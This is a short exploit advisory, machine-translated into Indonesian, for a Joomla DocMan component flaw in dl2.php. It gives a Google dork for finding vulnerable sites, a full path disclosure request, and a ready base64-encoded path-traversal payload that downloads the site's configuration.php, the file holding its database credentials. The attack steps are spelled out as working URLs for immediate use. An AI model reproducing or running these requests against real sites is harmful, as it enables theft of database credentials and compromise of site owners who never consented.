Joomla com_docman penuh Jalur Pengungkapan & Pengungkapan File Lokal / Sertakan

chmood

# Joomla docman Komponen 'com_docman' Path penuh Pengungkapan (FPD) & Pengungkapan File Lokal / Sertakan (LFD / LFI)
# CWE: cwe-200 (FPD) cwe-98 (LFI / LFD)
# Risiko: Tinggi
# Penulis: Hugo Santiago dos Santos
# Hubungi: [email protected]
# Tanggal: 13/07/2015
# Penjual Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl: "/ komponen / com_docman / dl2.php"

# Xploit (FPD):

Dapatkan satu sasaran dan hanya men-download dengan parameter kosong:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=

Dalam judul akan terjadi Penuh Jalan Pengungkapan server.

# Xploit (LFD / LFI):

http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]

Mari Xploit ...

Pertama kita perlu menggunakan Xploit FPD untuk melihat jalan target, setelah itu kita akan Insert 'configuration.php' file database konfigurasi dan encode di Base64:

../../../../../../../target/www/configuration.php <= Tidak Siap

http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Siap!

Dan Sekarang kita memiliki file konfigurasi ...




Komentar